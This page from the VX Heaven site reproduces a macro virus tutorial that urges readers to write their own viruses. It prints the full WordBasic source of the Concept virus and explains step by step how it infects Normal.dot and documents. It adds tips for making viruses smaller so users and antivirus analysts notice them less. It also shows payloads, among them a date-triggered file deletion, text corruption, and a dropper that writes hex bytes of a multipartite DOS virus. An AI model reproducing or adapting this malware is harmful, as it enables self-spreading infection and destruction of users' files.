Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Neophyte's Macro Virus Tutorial

Neophyte

[Back to index] [Comments]

First info about macro virii

A computer virus has lots of correspondences with biological virii (plural of virus). I will present a list with correspondences:

Computer viriiBiological virii
Infects other computers.Infects other people.
Tries to destroy or do something that isn't nice ;) to others.Makes you sick, and have consequents like throw up and stuff.
A virus waits with striking to get more computers infected.A virus waits with striking to get more people infected.
Anti-virus progs helps you (NOT!!) with uninfecting you system. There are medicines against almost all virii.

There are lots of more comparisons with biological virii. Imagine... At the moment there are 2 main types of computer virii:

  1. Virii created in assembler (or other program languages, but most of the time in assembler). Created for Dos or sometimes for windows (Bizatch, etc.)
  2. Virii created in MS-Word macro's (or other programs that have a good macro language) This sort will be the subject of this file.

The second type are the newest virii and spread much more faster then the first type.

Macro virii (the second type) are created with Microsoft Word for Windows 6.0 or higher, you may think how can I create a virus with a MS-Word?

MS-Word has a build in macro language, a macro language is almost the same as a programmer language (such as C++, Pascal, etc.). The MS-WORD macro language is a simple version of Visual Basic (a programmers language. It's not very hard to learn, only I never found the perfect book about Word macros.

An assembler virus (type 1) attaches himself to an executable file such as .EXE and .COM, a Word macro virus (type 2) Doesn't attaches himself to .EXE or .COM files, but to .DOC files (the standard MS-Word type). You might think, how can a .DOC file with text be infected? See the following picture for more info.

  Normal Word Document (.DOC)
    +--------------------+
    | Text + text-format |
    +--------------------+

  Word Template (doesn't matter which extension, .DOT is often used)
    +------------------------------------------+
    | Text + text-format + macros + Word setup |
    +------------------------------------------+

Word virii are created in macros, so if you want to create a macro virus you must be sure that the file is saved as a Word template, because in Word templates you can save macros. But the only problem is that Word templates are almost always saved as .DOT. So we must change the FileSaveAs program that it will save Word templates as .DOC.

What is a macro?

A macro is a sort of a list of things that MS-Word will do automaticcly when the macro is run.

Maybe it's going a bit fast now, so we'll take it all over now, but if you almost fallen asleap because you already knew everything, go on with SLAM.003 and enjoy...

A summary of what we had till now:

Ok that was that. We have the basics of a macro virus here. Now we'll go on with a specific macro virus, the Concept macro virus. It was the first macro virus and is probably the most in the wild virus.

In Word you can see if there are any macros installed. You do this with selecting the Tools/Macros. You then get a dialogbox with the names of the macros installed in the Normal.dot, Normal.dot is the template where Word saves its settings in and stores his macros in that are created or copied to the Normal.dot. Because Word automaticly opens the Normal.dot when Word is opened we must make sure to copy the virus macros to the Normal.dot.

If you understand everything till here you can read on. Otherwise you may consider reading it again from the start.

We'll continue our journey in creating macro virii with looking at the first Word macro virus, Concept. Because Concept is just a simple Word macro virus we'll start with this virus. It's detected by all AV-progs I know about but you must learn to walk before you can do the Polka!

The Concept Macro Virus

Before you going to do all the stuff down here it's good to do the following things:

Concept uses 5 different macros to infect and spread. The names of these macros are:

AAAZAO
(a copy of the AutoOpen macro)
AAAZFS
(becomes the FileSaveAs macro)
AutoOpen
(is automaticly executed when doc is opened)
FileSaveAs
(changes the fileSaveAs dialog so it will save as a template, but with a .doc extension)
PayLoad
(is the infection marker, this macro doesn't do anything, it's just for fun)

In word macro virii the following happens when anyone gets infected:

  1. You open an infected template (document)
  2. The AutoOpen macro in the infected template (document) copies all the virus macros from the template (document) to the Normal.dot
  3. The virus macros changes the FileSaveAs dialog so that it will save every (normal) document you want to save but changes it into a template and saves the macros of the virus in the document

This happens with almost every macro virii. There are exclusions, but I will explain these in later files.

Back to Concept.

The virus uses 5 macros, but if you look in an infected document (not the Normal.dot), with Tools/Macros you will see only 4. You might think: How the fuck is that possible??? It's not very hard to explain: It's quite logical. If you use an infected document (not the Normal.dot) you'll see the 4 macros:

And if you look at an infected Normal.dot you'll see:

You see that there isn't any AutoOpen macro in the Normal.dot. That's because it isn't nessecary, because nobody opens his Normal.dot manually. But if it's opened if you start Word the AutoOpen macro won't run automaticly. We'll come to this later. But in the infected document the AutoOpen macro is probably the most important macro. Because it does the actual infection of the Normal.dot. I'll show you later how the macro works. The PayLoad macro in the infected document is the same as in the infected Normal.dot and only contains a message: "That's enough to prove my point" It further has no use. The AAAZAO is a copy of the AutoOpen macro and the AAAZFS macro is a copy of the FileSaveAs macro. The use of these macros are explained in the drawing down here.

The macros that are copied to the Normal.dot when AutoOpen is executed

+--Infected document---+
| AAAZAO --------------+--------+
| AAAZFS --------------+-----+  |
| AutoOpen             |     |  |
| PayLoad -------------+--+  |  |
+----------------------+  |  |  |
                          |  |  |
+--Normal.dot----------+  |  |  |
| PayLoad <------------+--+  |  |
| FileSaveAs <---------+-----+  |
| AAAZFS <-------------+--------+
| AAAZAO <-------------+--------+
+----------------------+

You saw that AAAZFS is copied to AAAZFS and to FileSaveAs and AutoOpen was not. That's because it is running. You cannot copy any macro that is running. That's why FileSaveAs isn't copied when saving a document (and infect the document) because FileSaveAs is running. In stead of FileSaveAs, AAAZFS is copied. AAAZFS has the same contents as FileSaveAs. As you will see later.

Because AutoOpen isn't copied to the Normal.dot you must have another macro that has the same contents as the AutoOpen macro to infect other documents that aren't infected yet, because the infected document must have an AutoOpen macro in it to infect other computers. Got it? Here's another drawing to show you what happens if you save an uninfected document, with the FileSaveAs macro.

The macros that are copied to the uninfected document when FileSaveAs is executed.

+--Normal.dot----------+
| AAAZAO --------------+--------+
| AAAZFS --------------+-----+  |
| FileSaveAs           |     |  |
| PayLoad -------------+--+  |  |
+----------------------+  |  |  |
                          |  |  |
+--Uninfected document-+  |  |  |
| PayLoad <------------+--+  |  |
| AAAZFS <-------------+-----+  |
| AutoOpen <-----------+--------+
| AAAZAO <-------------+--------+
+----------------------+

I hope you got it. Now the final thing before we going to see the macros and their contents of the Concept macro virus.

Every virus must have a see-if-already-infected-thing in it. Because if it tries to infect a file for the second time you will see all kind off strange error messages. This counts for assembler virii and ofcourse for Word macro virii.

Source Code

This is the source code of the macro virus Concept, it was the first macro virus created ever. After the source I'll explain what it excactly does. Everything behind an " ' " are comments by me.

The Word Macro Virus Concept

'The macro AAAZAO (the backup of AutoOpen)

Sub MAIN
        On Error Goto Abort                'a build in errorhandler
        iMacroCount = CountMacros(0, 0)    'count all macros
        'see if we're already installed
        For i = 1 To iMacroCount
                If MacroName$(i, 0, 0) = "PayLoad" Then
                        bInstalled = - 1   'check if payload is in it yet
                End If
                If MacroName$(i, 0, 0) = "FileSaveAs" Then
                        bTooMuchTrouble = - 1  'FileSaveAs already installed?
                End If
        Next i
        If Not bInstalled And Not bTooMuchTrouble Then
                'add FileSaveAs and copies of AutoOpen and FileSaveAs.
                'PayLoad is just for fun.
                iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
                sMe$ = FileName$()
                sMacro$ = sMe$ + ":Payload"
                MacroCopy sMacro$, "Global:PayLoad" 'infect the Normal.dot
                sMacro$ = sMe$ + ":AAAZFS"
                MacroCopy sMacro$, "Global:FileSaveAs"
                sMacro$ = sMe$ + ":AAAZFS"
                MacroCopy sMacro$, "Global:AAAZFS"
                sMacro$ = sMe$ + ":AAAZAO"
                MacroCopy sMacro$, "Global:AAAZAO"
                SetProfileString "WW6I", Str$(iWW6IInstance + 1)
                MsgBox Str$(iWW6IInstance + 1)      'display a messagebox
        End If
Abort:
End Sub



'The macro AAAZFS (the backup of FileSaveAs)

Sub MAIN
'this becomes the FileSaveAs for the global template
Dim dlg As FileSaveAs
On Error Goto bail                'build in errorhandler
GetCurValues dlg
Dialog dlg
If dlg.Format = 0 Then dlg.Format = 1
sMe$ = FileName$()
sTMacro$ = sMe$ + ":AutoOpen"
MacroCopy "Global:AAAZAO", sTMacro$    'saves the documents with the macros
sTMacro$ = sMe$ + ":AAAZAO"
MacroCopy "Global:AAAZAO", sTMacro$
sTMacro$ = sMe$ + ":AAAZFS"
MacroCopy "Global:AAAZFS", sTMacro$
sTMacro$ = sMe$ + ":PayLoad"
MacroCopy "Global:PayLoad", sTMacro$
FileSaveAs dlg
Goto Done

Bail:
If Err <> 102 Then           'if an error comes up just display the
        FileSaveAs dlg       'FileSaveAs dialog
End If
Done:
End Sub



The macro AutoOpen

Sub MAIN
        On Error Goto Abort               'build in errorhandler
        iMacroCount = CountMacros(0, 0)   'count the macros
        'see if we're already installed
        For i = 1 To iMacroCount
                If MacroName$(i, 0, 0) = "PayLoad" Then
                        bInstalled = - 1   'check if PayLoad is in already
                End If
                If MacroName$(i, 0, 0) = "FileSaveAs" Then
                        bTooMuchTrouble = - 1 'FileSaveAs already installed?
                End If
        Next i
        If Not bInstalled And Not bTooMuchTrouble Then
                'add FileSaveAs and copies of AutoOpen and FileSaveAs.
                'PayLoad is just for fun.
                iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
                sMe$ = FileName$()
                sMacro$ = sMe$ + ":Payload"
                MacroCopy sMacro$, "Global:PayLoad"   'infect the Normal.dot
                sMacro$ = sMe$ + ":AAAZFS"
                MacroCopy sMacro$, "Global:FileSaveAs"
                sMacro$ = sMe$ + ":AAAZFS"
                MacroCopy sMacro$, "Global:AAAZFS"
                sMacro$ = sMe$ + ":AAAZAO"
                MacroCopy sMacro$, "Global:AAAZAO"
                SetProfileString "WW6I", Str$(iWW6IInstance + 1)
                MsgBox Str$(iWW6IInstance + 1)  'display a messagebox
        End If
Abort:
End Sub



The macro FileSaveAs

Sub MAIN
'this becomes the FileSaveAs for the global template
Dim dlg As FileSaveAs
On Error Goto bail      'build in errorhandler
GetCurValues dlg
Dialog dlg
If dlg.Format = 0 Then dlg.Format = 1
sMe$ = FileName$()
sTMacro$ = sMe$ + ":AutoOpen"
MacroCopy "Global:AAAZAO", sTMacro$  'infects Normal.dot
sTMacro$ = sMe$ + ":AAAZAO"
MacroCopy "Global:AAAZAO", sTMacro$
sTMacro$ = sMe$ + ":AAAZFS"
MacroCopy "Global:AAAZFS", sTMacro$
sTMacro$ = sMe$ + ":PayLoad"
MacroCopy "Global:PayLoad", sTMacro$
FileSaveAs dlg
Goto Done

Bail:
If Err <> 102 Then        'If an error comes up just display
        FileSaveAs dlg    'the FileSaveAs dialog
End If
Done:
End Sub

Don't quit now if you don't understand a thing of it, most of you will not understand it right now. I will discuss the macros now. You probably have seen that the macros FileSaveAs and AAAZFS are the same. The macros AutoOpen and AAAZAO are the same to. It's quite logical because the AAAZFS gets copied to the FileSaveAs and the AAAZAO is copied to the AutoOpen macro. So because of the two same macros I will only discuss two macros with you, the FileSaveAs and AutoOpen, more is not neccesary. If your Normal.dot has the Concept macros you can easily watch them by clicking Tools/Macro---->"choose macro you want to view" and click Edit

Here follows the macros AutoOpen and FileSaveAs again only now with more explanation, I hope you get it now.

>comment from me about the line above

The Macro FileSaveAs
--------------------
>This all happens when you click File/Save As... in Word.

----------------------------------------------------------------
Sub MAIN
>Every macro begins with this and ends with "End Sub".

Dim dlg As FileSaveAs
>Set the dialog as FileSaveAs.

On Error Goto bail
>If an error occurs goto bail, see "bail:" down the macro where it goes.

GetCurValues dlg
>Gets the cursur place, and other settings of the cursur,
>from the dialog (FileSaveAs dialog).

Dialog dlg

If dlg.Format = 0 Then dlg.Format = 1
>If dialog format is 0 then change it to 1.

sMe$ = FileName$()
>The string sMe$ is the active document in Word.

sTMacro$ = sMe$ + ":AutoOpen"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AutoOpen".

MacroCopy "Global:AAAZAO", sTMacro$
>Copies the macro AAAZAO from the Normal.dot (global template) to the
>sTMacro$ (active document + :AutoOpen).

sTMacro$ = sMe$ + ":AAAZAO"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZAO".

MacroCopy "Global:AAAZAO", sTMacro$
>Copies the macro AAAZAO from the Normal.dot (global template) to the
>sTMacro$ (active document + :AAAZAO).

sTMacro$ = sMe$ + ":AAAZFS"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZFS".

MacroCopy "Global:AAAZFS", sTMacro$
>Copies the macro AAAZFS from the Normal.dot (global template) to the
>sTMacro$ (active document + :AAAZFS).

sTMacro$ = sMe$ + ":PayLoad"
>The string sTMacro$ is the same as sMe$ (the active document) + ":PayLoad".

MacroCopy "Global:PayLoad", sTMacro$
>Copies the macro PayLoad from the Normal.dot (global template) to the
>sTMacro$ (active document + :Payload).

FileSaveAs dlg
>Shows the FileSaveAs Dialog.

Goto Done
>If everything is gone good goto Done.

Bail:
>This is where the macro jumps to when an error occurs (see On error
>goto bail, at the top of this macro).

If Err <> 102 Then
        FileSaveAs dlg
>If the error number is different to 102 then the macro will show the
>FileSaveAs Dialog.

End If
>The end of an "if" instruction see above (If err <> 102 then FileSaveAs dlg).

Done:
>This is where the macro goes to when everything has gone good.
>The "goto done" instruction does this.

End Sub
>Every Word macro stops with this.
----------------------------------------------------------------

The Macro AutoOpen
------------------
>This all happens when an infected document is opened.

----------------------------------------------------------------
Sub MAIN
>Every macro begins with this and ends with "End Sub".

        On Error Goto Abort
>If an error occurs goto abort, see "abort:" down the macro where it goes.

        iMacroCount = CountMacros(0, 0)
>Count how many macros are in Normal.dot (global template).

        For i = 1 To iMacroCount
>A loop in the macro that runs again if "Next i" instruction is executed.
>Because iMacroCount is the amount of macros in the Normal.dot it will
>check all macros.

                If MacroName$(i, 0, 0) = "PayLoad" Then
                        bInstalled = - 1
>If Macro name is PayLoad then bInstalled is - 1

                End If
>The end of an "if" instruction.

                If MacroName$(i, 0, 0) = "FileSaveAs" Then
                        bTooMuchTrouble = - 1
>If Macro name is FileSaveAs then bTooMuchTrouble = - 1

                End If
>The end of an "if" instruction.

        Next i
>The "Next i" instruction that tells the for...next loop to return to the
>for...next loop if i is more then already done.

        If Not bInstalled And Not bTooMuchTrouble Then
>If bInstalled is not 0 and if bTooMuchTrouble is not 0 then do
>everything below this.

                iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
>Sets the iWW6IInstance string as Val(GetdocumentVar$("WW6Infector"))
>This is not that important because it's only used for the message box
>below.

                sMe$ = FileName$()
>The string sMe$ is the active document in Word.

                sMacro$ = sMe$ + ":Payload"
>The string sTMacro$ is the same as sMe$ (the active document) + ":PayLoad".

                MacroCopy sMacro$, "Global:PayLoad"
>Copies the macro PayLoad (sMacro$) from the active infected document to the
>global template (most of the times Normal.dot).

                sMacro$ = sMe$ + ":AAAZFS"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZFS".

                MacroCopy sMacro$, "Global:FileSaveAs"
>Copies the macro AAAZFS (sMacro$) from the active infected document to the
>global template (most of the times Normal.dot) with the name FileSaveAs.

                sMacro$ = sMe$ + ":AAAZFS"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZFS".

                MacroCopy sMacro$, "Global:AAAZFS"
>Copies the macro AAAZFS (sMacro$) from the active infected document to the
>global template (most of the times Normal.dot).

                sMacro$ = sMe$ + ":AAAZAO"
>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZAO".

                MacroCopy sMacro$, "Global:AAAZAO"
>Copies the macro AAAZAO (sMacro$) from the active infected document to the
>global template (most of the times Normal.dot).

                SetProfileString "WW6I", Str$(iWW6IInstance + 1)
>Set the profile string "WW6I" to Str$(iWW6IInstance + 1).
>The actual thing done here is put a 1 in Str$(iWW6IInstace + 1)
>This isn't that important because it is only used to place the "1" in the
>message box below.

                MsgBox Str$(iWW6IInstance + 1)
>This displays a message box containing the Str$(iWW6IInstance + 1).
>Because Str$(iWW6IInstance + 1) is "1" the message box just displays a "1".

        End If
>The end of the "if" instruction "If not bInstalled and not bTooMuchTrouble".

Abort:
>This is the place where the macro goes when an error occurs.

End Sub
>Every Word macro stops with this.
----------------------------------------------------------------

The Macro virus Concept is included with this SLAM issue in the file Concept.zip

Enjoy creating your first macro virus and learn from the WordBasic help file and books. You can read on with the mag if you want but it's probably better if you first learn something more about the Word macro language WordBasic.

How to optimize your macro virii

Ok, this one may not be very long but I think it's effective enough to put it in here.

As with every sort of virus there is a rule that if something is smaller it will go faster. With macro virii it doesn't really matter how fast the virus works because when you work on a Pentium 166 with a load of memory you will not notice the virus is even active, but there are other reasons to make your virus smaller. For instance, If your virus is 10k big and it infects a journalists network, and all the journalists together will create 250 documents in a day I'm sure somebody will notice that in 10 days the harddisk space is increased with 25 megabyte, so if you can make your virus 9k big the lost harddisk space in 10 days is only 22,5 megabytes. 2,5 megabytes with just 1k decreasement.

I hope you get the point, now I will give you a couple things to decrease your virus length with.

Never put any comments in the actual virus, I mean, don't put any comments in the virus you will spread. If you put a virus in a magazine or something, it's better to put comments in it.

Also, use as much strings as possible. I've tested it with a simple test: Create an empty template, and create a macro in that template. Now delete the Sub Main and End Sub commands and type a line like this: 'Welcome to the SLAM magazine issue 1, the Document X' Then select the line and use copy and paste to copy the line for about 50 times. When that's done select all the 50 lines and use the edit-->copy command. Then save the template with the macro as 'Test1.dot'.

Then create a second empty template and also create a macro in that template and delete the Sub Main and End Sub commands. Then paste the 50 lines to the empty macro. After that use the find replace command and type at find: Welcome to the SLAM magazine issue 1, the Document X and type at replace: A$ Check to see if every line is changed in A$. then type this at the top of the macro: A$ = "Welcome to the SLAM magazine issue 1, the Document X" And finally save the template as Test2.dot.

Now go to dos and check the length of both files. See any differences?

And don't use long labels, see the following example:

In stead of using this:

-----------------------------------------------------------
Sub Main

CheckNumber = 0
Check_CheckNumber:
If CheckNumber = 5 then goto CheckNumber_is_5 else goto Checknumber_is_not_5

CheckNumber_is_not_5:
CheckNumber = CheckNumber + 1
goto Check_Checknumber

CheckNumber_is_5:
MsgBox "CheckNumber is 5", "Finished"

End Main
-----------------------------------------------------------

You could use this:

-----------------------------------------------------------
Sub Main

C = 0
F:
If C = 5 then goto A else goto B

B:
C = C + 1
goto F

A:
MsgBox "CheckNumber is 5", "Finished"

End Main
-----------------------------------------------------------

And with a bit thinking :) you could do this:

-----------------------------------------------------------
Sub Main

C = 0

B:
C = C + 1

If C = 5 then goto A
goto B

A:
MsgBox "CheckNumber is 5", "Finished"

End Main
-----------------------------------------------------------

You got it now? Ok, it won't make your virus more readable with it but it's smaller. And what the fuck do you care if some AV-pussy can't understand it :)

I think you can make up other things to decrease the size of your virus. Be creative.....

Payloads in macro virii

This file is about payloads. Payloads are things a virus does on a special time. It's best if you not activate the payload on the first infection because the user then knows that he has a virus. Many virii look for the date and time to deliver the payload, or they can watch how many files they already infected on that computer.

For example: A virus gets into your computer and you don't notice it. When the virus infected the 100th file the virus delivers the payload, your (precious) hard disk is overwritten.

This was just an example of a payload, if you gonna write a virus, be original!

But we're going to talk about payloads in macro virii so lets start. A macro virus will most of the time look at the date for delivering the payload. We'll give a couple examples of payloads in existing macro virii.

The payload in the Atom macro virii

----------------------------------------------------------------
Sub MAIN
On Error Goto KillError
If Day(Now()) = 13 And Month(Now() = 12) Then
        Kill "*.*"
End If
KillError:
End Sub
----------------------------------------------------------------

As you can see it will check if the day is the 13th of the month 12 (december), and if it's the 12th of december it will delete (kill) *.*.

An other example of a payload is the following:

'Payload macro from the concept virus

----------------------------------------------------------------
Sub MAIN
        REM That's enough to prove my point
End Sub
----------------------------------------------------------------

This one does no harm and only contains a text string. The name of the macro is payload and concept checks for this macro to see if he is already installed (infected).

Down here, again another payload, this time from the Wazzu virus:

----------------------------------------------------------------
If Rnd() < 0.25 Then
        RndWord
        Insert "wazzu "
        StartOfDocument
End If
----------------------------------------------------------------

The above piece of a macro generates a random number, and if the number is lower then 0.25 it will put the word Wazzu at the begin of the document.

The next one is from the Parasite 1.0 macro virus:

----------------------------------------------------------------
Sub MAIN
n = Day(Now())
If n = 16 Then Goto y
If n < 16 Then Goto n
If n > 16 Then Goto n
y:
EditReplace .Find = ".", .Replace = ",", .Direction = 0, .MatchCase = 0, .WholeWord = 1,
               .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0,
                       .Wrap = 1, .FindAllWordForms = 0
EditReplace .Find = "a", .Replace = "e", .Direction = 0, .MatchCase = 0, .WholeWord = 1,
               .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0,
                       .Wrap = 1, .FindAllWordForms = 0
n:
EditReplace .Find = "and", .Replace = "not", .Direction = 0, .MatchCase = 0, .WholeWord = 1,
               .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0,
                       .Wrap = 1, .FindAllWordForms = 0
sMe$ = FileName$()
FileSaveAs .Name = sMe$, .Format = 1
sTMacro$ = sMe$ + ":AutoOpen"
MacroCopy "Global:PARA", sTMacro$, 4
sTMacro$ = sMe$ + ":PARA"
MacroCopy "Global:PARA", sTMacro$, 4
sTMacro$ = sMe$ + ":SITE"
MacroCopy "Global:SITE", sTMacro$, 3
sTMacro$ = sMe$ + ":PayLoad"
MacroCopy "Global:PayLoad", sTMacro$, 1
sTMacro$ = sMe$ + ":K"
MacroCopy "Global:AutoExec", sTMacro$, 5
sTMacro$ = sMe$ + ":a678"
MacroCopy "Global:AutoOpen", sTMacro$, 6
sTMacro$ = sMe$ + ":I8U9Y13"
MacroCopy "Global:AutoExit", sTMacro$, 7
FileSaveAs .Name = sMe$, .Format = 1

End Sub
----------------------------------------------------------------

This is the whole FileSaveAs macro from Parasite 1.0 it first looks for the date, and checks if the day is 16. And if it is the 16th the virus will change all "." to "," and all "a" to "e" and all "and" to "not". The last thing (and --> not) the virus does with every save of a document. (I personally like this one ;)

And finally I'll show you, what I call, the debug payloads. Look at the following example. If you know debug the following will be familiar.

----------------------------------------------------------------
On Error Goto NoDropper             'setup an error handler

Open "c:\dos\debug.exe" For Input As #1
Close #1
                        'The list of numbers is the hex code of the
                        '"Neurobasher.b" multipartite virus.
Open "c:\dos\script.scr" For Output As #1
Print #1, "N debugger.exe"    'uses debug to create file "debugger.exe"
Print #1, "E 0100 4D 5A EC 00 0C 00 00 00 20 00 00 00 FF FF 00 00"
Print #1, "E 0110 00 00 32 2D 00 00 01 00 1E 00 00 00 01 00 00 00"
Print #1, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0300 B8 00 4C CD 21 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0310 E9 3D 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0350 FC 2B FF B4 F2 CD 13 72 47 B4 62 CD 21 8E C3 2B"
Print #1, "E 0360 FF 53 4B 8E DB BB FF FF 80 FF 50 77 0C A1 03 00"
Print #1, "E 0370 2B C3 29 45 12 B4 4A CD 21 5B 8E DB 83 C3 10 FA"
Print #1, "E 0380 BC 00 00 8D 87 00 00 8E D0 81 C3 00 00 FB 9C 53"
Print #1, "E 0390 68 00 00 2B DB 33 C9 8B D1 33 F6 8B EE 33 C0 CF"
Print #1, "E 03A0 E8 00 00 5E B9 00 12 81 EE 93 00 0E 1F 68 00 7C"
Print #1, "E 03B0 07 06 68 A8 00 F3 A4 CB 6A 49 B4 52 CD 21 BB 84"
Print #1, "E 03C0 00 8E D9 2E 8C 06 E0 01 B8 AF 01 87 47 80 50 8C"
Print #1, "E 03D0 C8 87 47 82 50 9C 58 80 CC 01 50 9D B4 4D 9C FF"
Print #1, "E 03E0 1F 2E A1 8F 14 2E A3 93 14 2E A1 91 14 2E A3 95"
Print #1, "E 03F0 14 2E C7 06 E0 01 00 F0 B4 00 99 9C FF 5F C8 8F"
Print #1, "E 0400 47 82 8F 47 80 E8 81 01 C7 45 EC 98 05 C7 45 FC"
Print #1, "E 0410 C3 02 B8 F0 04 8B D0 B7 13 93 CD 2F 2E C5 3E 93"
Print #1, "E 0420 14 E8 F7 02 60 0E 1F 0E 07 80 FA 80 74 17 B4 04"
Print #1, "E 0430 CD 1A 8A C6 04 03 27 3C 12 76 03 2C 12 41 A2 70"
Print #1, "E 0440 02 88 0E 69 02 B8 01 02 BB 8F 12 B9 01 00 BA 80"
Print #1, "E 0450 00 E8 A9 0A 80 7F 09 8E 74 63 B1 04 8D B7 AE 01"
Print #1, "E 0460 83 C6 10 38 14 E0 F9 E3 54 8A 44 04 3C 01 74 08"
Print #1, "E 0470 3C 04 72 49 3C 06 77 45 8B 44 08 3C 11 72 3E E8"
Print #1, "E 0480 A1 0A B1 07 E8 73 0A 41 89 0E 0C 02 89 16 0F 02"
Print #1, "E 0490 53 33 DB B8 09 03 E8 64 0A 5B BE F8 01 8B FB B1"
Print #1, "E 04A0 1E F3 A4 B0 02 B9 E0 01 F3 AA B1 01 E8 4B 0A B8"
Print #1, "E 04B0 01 02 B6 01 E8 46 0A E8 69 0A E8 3D 0A 61 C3 60"
Print #1, "E 04C0 1E 8B EC C5 76 12 E8 9B 09 3D CC CF 74 26 3D 63"
Print #1, "E 04D0 80 75 1A 81 7C 04 72 11 75 13 81 7C 0E E4 CF 74"
Print #1, "E 04E0 13 3D 2E FF 75 07 81 7C 09 FA 9A 74 07 8C D8 3D"
Print #1, "E 04F0 00 F0 75 11 8C D8 2E A3 91 14 8B 46 12 2E A3 8F"
Print #1, "E 0500 14 80 66 17 FE 1F 61 CF FA 33 C0 8E D0 BC 00 7C"
Print #1, "E 0510 FB 8E C4 06 68 16 02 93 B8 09 02 B9 08 00 BA 80"
Print #1, "E 0520 00 CD 13 72 FE CB FC E8 5F 00 06 0E 07 B8 F0 04"
Print #1, "E 0530 BE 84 00 BF 8F 14 87 44 C8 AB 33 C0 87 44 CA AB"
Print #1, "E 0540 A5 A5 07 B8 01 02 8B DC 49 CD 13 0A D2 74 03 E8"
Print #1, "E 0550 D1 09 06 53 B1 FF 43 81 3F C2 73 75 04 C6 47 01"
Print #1, "E 0560 EB 81 3F A7 75 75 03 88 67 02 E2 EA E8 B5 FE 40"
Print #1, "E 0570 A3 44 0C B4 04 CD 1A 80 F9 90 77 07 72 0A 80 FE"
Print #1, "E 0580 04 72 05 C6 06 41 0C 90 CB 2E C6 06 41 0C C3 33"
Print #1, "E 0590 C0 8E D8 8E C0 2E A2 99 05 2E A3 B4 04 BF F0 04"
Print #1, "E 05A0 B0 EA AA 88 45 EF B8 A6 02 AB C7 45 EE B3 04 8C"
Print #1, "E 05B0 C8 AB 89 45 EE C3 60 1E 06 6A 00 1F 80 3E 87 00"
Print #1, "E 05C0 08 77 0D C7 06 F1 04 C3 02 C5 3E 84 00 E8 4B 01"
Print #1, "E 05D0 07 1F 61 E8 7B 09 2E FF 06 A1 0E 81 FC 00 13 72"
Print #1, "E 05E0 0B 81 FC 00 16 77 05 80 FC F2 74 69 80 FC 02 74"
Print #1, "E 05F0 05 80 FC 03 75 41 83 FA 02 72 5D 80 FA 80 75 37"
Print #1, "E 0600 83 F9 01 75 37 80 FE 01 77 2D 51 FE C8 74 0C 50"
Print #1, "E 0610 53 80 C7 02 41 E8 E5 08 49 5B 58 B0 01 80 FA 01"
Print #1, "E 0620 77 08 B9 01 50 E8 D5 08 EB 09 0A F6 75 02 B1 07"
Print #1, "E 0630 E8 EA 08 59 CA 02 00 2E FF 2E 8F 14 0A F6 75 F7"
Print #1, "E 0640 50 8C C8 80 FC 7C 58 74 EE 83 F9 11 77 E9 80 F9"
Print #1, "E 0650 06 72 E4 B4 00 F8 EB DC 83 F9 01 75 DA 50 E8 9C"
